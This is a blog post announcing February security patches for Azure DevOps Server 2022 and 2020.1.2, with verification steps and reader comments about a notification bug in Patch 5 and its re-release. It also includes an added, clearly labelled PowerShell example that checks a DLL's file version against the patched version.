Updated: February patches for Azure DevOps Server
2/17 Update: After installing Azure DevOps Server 2020.1.2 Patch 5, notifications were not getting delivered. To address this issue, we are re-releasing the patch. If you installed Patch 5, you should download and re-install the patch from the link provided in the instructions below.
This month, we are releasing fixes that impact our self-hosted product, Azure DevOps Server.
The following will be fixed with this patch:
- CVE-2023-21564: Azure DevOps Server Cross-Site Scripting Vulnerability
- CVE-2023-21553: Azure DevOps Server Remote Code Execution Vulnerability
- Updated MSBuild and VSBuild tasks to support Visual Studio 2022.
- Updated the methodology of loading reauthentication to prevent an XSS attack vector.
- Azure DevOps Server 2022 Proxy reports the following error: VS800069: This service is only available in on-premises Azure DevOps.
- Fixed shelvesets accessibility issue via web UI.
Azure DevOps Server 2022 Patch 2
If you have Azure DevOps Server 2022, you should install Azure DevOps Server 2022 Patch 2. Check out the release notes for more details.
Verifying Installation
- Run devops2022patch2.exe CheckInstall, where devops2022patch2.exe is the file that is downloaded from the link above. The output of the command will either say that the patch has been installed, or that it is not installed.
Azure DevOps Server 2020.1.2 Patch 5
If you have Azure DevOps Server 2020.1.1, you should first update to Azure DevOps Server 2020.1.2. Once on 2020.1.2, install Azure DevOps Server 2020.1.2 Patch 5. Check out the release notes for more details.
Verifying Installation
- Run devops2020.1.2patch5.exe CheckInstall, where devops2020.1.2patch5.exe is the file that is downloaded from the link above. The output of the command will either say that the patch has been installed, or that it is not installed.
36 comments
The link for release notes points to an internal protected website: review.learn.microsoft.com
Hi Daniel, thank you for reporting this. It has been fixed.
LGTM. I had installed the 2022.patch1 and 2022.patch2 on my lab server. After installing both patch files, I reopened the azuredevops manager console, and the version number is still Server2022, not showing the patch number. How can I make sure the patch was already installed completely?
Hi Quintos, did you try the verification steps listed in the blog post? You can also check the version of the following file:
Azure DevOps Server 2022 is installed to c:\Program Files\Azure DevOps Server 2022 by default. After installing Azure DevOps Server 2022 Patch 2, the version will be 19.205.33402.2.
Thanks. It works. And if I reinstall the patch2.exe, it will show the current installed patch version.
@Gloridel
After running a fresh installation of Azure DevOps Server 2020.1 and upgrading it with the various patches until Azure DevOps Server 2022 Patch 2, the file Microsoft.TeamFoundation.Framework.Server.dll is found in folder “Application Tier\Web Services\bin” and not in “Application Tier\bin” as you wrote.
In addition various files including “Application Tier\bin\Microsoft.TeamFoundation.Framework.Server.dll” from Azure DevOps Server 2020 installation are not uninstalled.
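The file-version check discussed in the comments above, as an added PowerShell example that is not part of the blog post or of any comment. It assumes the default install root, takes the DLL name and both sub-folders from the comments on this page, and uses a hypothetical helper name, Test-AzDoPatchLevel.

```powershell
# Added example: compare the on-disk file version with the patched version quoted on this page.
# Assumptions: default install root; the DLL name and the two sub-folders are the ones
# mentioned in the comments; Test-AzDoPatchLevel is a hypothetical helper name.
function Test-AzDoPatchLevel {
    param(
        [string]$InstallRoot     = 'C:\Program Files\Azure DevOps Server 2022',
        [version]$PatchedVersion = '19.205.33402.2',   # 2022 Patch 2, as stated on the page
        [string]$FileName        = 'Microsoft.TeamFoundation.Framework.Server.dll',
        [string[]]$SubFolders    = @('Application Tier\Web Services\bin', 'Application Tier\bin')
    )

    foreach ($sub in $SubFolders) {
        $path = Join-Path (Join-Path $InstallRoot $sub) $FileName

        if (-not (Test-Path -LiteralPath $path)) {
            [pscustomobject]@{ Path = $path; FileVersion = $null; Status = 'NotFound' }
            continue
        }

        $info = (Get-Item -LiteralPath $path).VersionInfo
        # Build the version from its numeric parts; the FileVersion string can carry extra text.
        $found = [version]::new($info.FileMajorPart, $info.FileMinorPart,
                                $info.FileBuildPart, $info.FilePrivatePart)

        # Equal or higher than the patched version counts as patched.
        $status = if ($found -ge $PatchedVersion) { 'Patched' } else { 'BelowPatchLevel' }
        [pscustomobject]@{ Path = $path; FileVersion = $found; Status = $status }
    }
}

# Report one row per candidate location.
Test-AzDoPatchLevel | Format-Table -AutoSize
```

A BelowPatchLevel row for “Application Tier\bin” on an upgraded server can be a leftover file from the earlier installation, as the comment above describes, so judge the patch level by the copy under “Application Tier\Web Services\bin”.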
Link to the developer community report of the proxy issue:
https://developercommunity.visualstudio.com/t/Proxy-upgrade-to-2022-breaks-its-functio/10264792
Hi!
We’re missing Updates to Azure File Copy task and Repository as protected resource features in our installation of Azure DevOps Server 2022 v19.205.33122.1.
https://developercommunity.visualstudio.com/t/Azure-File-Copy-task-v5-missing-in-Azure/10275323?viewtype=all
https://developercommunity.visualstudio.com/t/Feature-Add-protection-to-repository-re/10275298
When will these be available?
After installing the patch (patching from plain 2020.1.2 to 2020.1.2 patch 5) on our instance, it didn't send any mail notifications (pull requests, approval, comment mentions). Mail test from Console was successful but event log showed many errors (I removed some personal information):
Application Domain: TfsJobAgent.exe
Assembly: Microsoft.TeamFoundation.Framework.Server, Version=18.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a; v4.0.30319
Service Host: XXXXXXX (DefaultCollection)
Process Details:
Process Name: TfsJobAgent
Account name: XXXX
Detailed Message: TF400703: Unable to initialize the specified service Microsoft.TeamFoundation.Framework.Server.SmtpSettingsService.
Exception Message: TF400367: The request could not be performed due to a host type mismatch. Please check any connection information and verify the information is correct. The request was executed against a ProjectCollection. (type UnexpectedHostTypeException)
Exception Stack Trace: at Microsoft.TeamFoundation.Framework.Server.VssRequestContextExtensions.CheckDeploymentRequestContext(IVssRequestContext context)
at Microsoft.TeamFoundation.Framework.Server.SmtpSettingsService.Microsoft.TeamFoundation.Framework.Server.IVssFrameworkService.ServiceStart(IVssRequestContext systemRequestContext)
at Microsoft.TeamFoundation.Framework.Server.ServiceProvider.CreateService(IVssRequestContext requestContext, Type requestedType, Type managedType)
We restored our instance through restoring the modified files from C:\Program Files\Azure DevOps Server 2020\Backup.
After restoring files and starting services again, all mails that should have been sent were delivered immediately.
We are in the process of making an official call but please have a look at the code changes in SmtpSettingsService.ServiceStart.
I am interested in where this ends. We would not like to update if it results in no notification mails.
I also made a Developer Community report.
Hi Michael, I forwarded your message to our team for investigation.
FWIW, I can confirm the exact same behavior identified by Michael Hauer after I applied Patch 5. Besides test emails generated from the console, no other alerts are working.
Hello,
Thanks for reporting this issue. We addressed it and will re-release the patch very soon.
Customers who already installed Patch 5 for Azure DevOps Server 2020.1.2 will need to download the updated patch and re-install it.
Sorry for the inconvenience it caused. We will reply to this thread once the updated patch is available.
Regards,
–Vladimir
Thank you all for reporting this issue. We have re-released the patch and it is ready for you to install from the links provided in this blog.
So this did not impact 2022 Patch 2?
Correct, it didn’t impact Azure DevOps Server 2022 Patch 2.
Gloridel,
What is the difference between Azure DevOps Server 2022 Patch2 version 19.205.33402.2 released on Feb 15 and the download from Azure DevOps Server 2022 Patch2 version 18.181.32404.7 downloaded Feb 22?
The same 2022 Patch 2 with two different version numbers is confusing, especially as the old list of Azure DevOps Server build numbers is no longer updated with official released Azure DevOps Server patches.
Daniel, they are both the same.
I can confirm that the re-released patch for 2020 fixes the reported issue.
After applying the patch on AzDO 2020.1.2, classic pipeline still shows only MSbuild 16.0/Visual Studio 2019
@Markus,
What are you expecting? Visual Studio 2022?
Support for VS 2022 is only added in AzureDevOps Server 2022 Patch 2 but not in 2020.1.2.
If you need VS 2022 support with AzDO 2020.1.2, then you can install Visual Studio 2022 support by Jesse from marketplace https://marketplace.visualstudio.com/items?itemName=jessehouwing.visualstudio and later switch back to standard task with VS2022 support after upgrading to AzDO 2022.
We’re currently using it and it works, except that it is annoying to replace all the tasks which are using Visual Studio or VS Test.
Ok, then the description is misleading.
BTW, the description also doesn’t mention that the build agent version will be updated (Which makes sense for supporting VS2022, which according to your statement is not the case 🤔)
I totally agree with Markus, so the blog reads like the changes are included in both patches, also Updated MSBuild and VSBuild tasks to support Visual Studio 2022. That could be improved.
The content of the blog could be misleading.
You need to read the release notes for both patches and then you get that updated tasks for VS2022 are only included in Azure DevOps Server 2022 patch 2.
Thank you, Markus, Daniel, and Alexander, for your feedback. It makes sense to specify in the blog post the changes that are applicable to each version of the product.
Just to be on the safe side: I plan to do a fresh installation of Azure DevOps Server 2020.1.2 via ISO-Download. Is patch 5 cumulative or do I have to install all previous patches before patch 5?
Hi Raphael, patches are cumulative. You should install Azure DevOps Server 2020.1.2 Patch 5 after the fresh install of Azure DevOps Server 2020.1.2.
After installing the Patch 1.5 for AzureDevOps 2020 our server says that Version 18.181.33417.3 (Azure DevOps Server 2020 Update 1.2) is installed.
Could you please verify that this is the version expected after successful installation of patch 1.5?
Best Regards
Andreas
Hi Andreas, 18.181.33417.3 is the version after installing Azure DevOps Server 2020.1.2 Patch 5.
Thank you very much 🙂